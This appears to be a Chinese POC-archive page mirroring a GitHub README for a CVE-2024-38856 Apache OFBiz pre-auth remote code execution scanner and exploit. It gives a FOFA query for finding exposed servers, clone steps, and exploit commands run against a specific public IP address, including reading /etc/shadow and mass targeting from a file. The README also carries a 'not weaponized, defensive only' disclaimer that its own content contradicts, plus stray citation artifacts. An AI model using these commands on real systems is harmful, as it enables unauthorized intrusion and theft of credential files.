关联漏洞
标题:Apache OFBiz 安全漏洞 (CVE-2024-38856)Description:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.14及之前版本存在安全漏洞,该漏洞源于存在授权错误漏洞,从而导致未经身份验证的端点可执行屏幕渲染代码。
Description
CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit
介绍
# CVE-2024-38856 — Apache OFBiz (Repository documentation)
> **Repository purpose:** informational documentation about CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE).
> This repository **does not** contain weaponized exploit code. It is intended for defensive research, patching guidance, detection, and safe lab testing only.
---
## Overview
**CVE-2024-38856** is an incorrect-authorization vulnerability in Apache OFBiz that may allow unauthenticated access to certain endpoints and, under specific conditions, enable execution of screen rendering code which can lead to remote code execution on affected systems. The issue was fixed in Apache OFBiz **18.12.15**; earlier releases up to **18.12.14** are affected. :contentReference[oaicite:0]{index=0}
**Severity / Impact:** multiple security vendors and researchers rated this vulnerability as critical — it can lead to unauthenticated remote code execution on vulnerable instances, and has been observed in active exploitation attempts in the wild. Administrators should treat exposed OFBiz instances as high-priority remediation items. :contentReference[oaicite:1]{index=1}
---
## Affected versions
- Apache OFBiz: **through 18.12.14** (i.e., all releases <= 18.12.14 are considered vulnerable). The issue was addressed in **18.12.15**. Upgrade is recommended. :contentReference[oaicite:2]{index=2}
### ``` fofa : app="Apache_OFBiz" && port="8443" ```
<img width="1916" height="956" alt="Screenshot 2025-10-10 183057" src="https://github.com/user-attachments/assets/f16df50d-168f-467c-8b90-2e114d66d59d" />
# Exploit:
### ``` git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git ```
### ``` cd CVE-2024-38856-Apache-OFBiz ```
### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami" ```
### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig" ```
### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls" ```
### ``` └─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow" ```
<img width="1478" height="745" alt="Screenshot 2025-10-10 184101" src="https://github.com/user-attachments/assets/87b05f89-3098-4a05-b30f-2e35713f4069" />
### ``` ─$ python3 apache_bang.py --file target.txt -c "ls" ```
<img width="1465" height="739" alt="Screenshot 2025-10-10 075018" src="https://github.com/user-attachments/assets/26b47ec5-ea76-4011-beda-ab6ccf38ced0" />
文件快照
[4.0K] /data/pocs/56358b3bf7c9b571b0637d0f7224ac4eb7345e2a
├── [7.9K] Apache_bang.py
├── [1.0K] LICENSE
└── [2.5K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。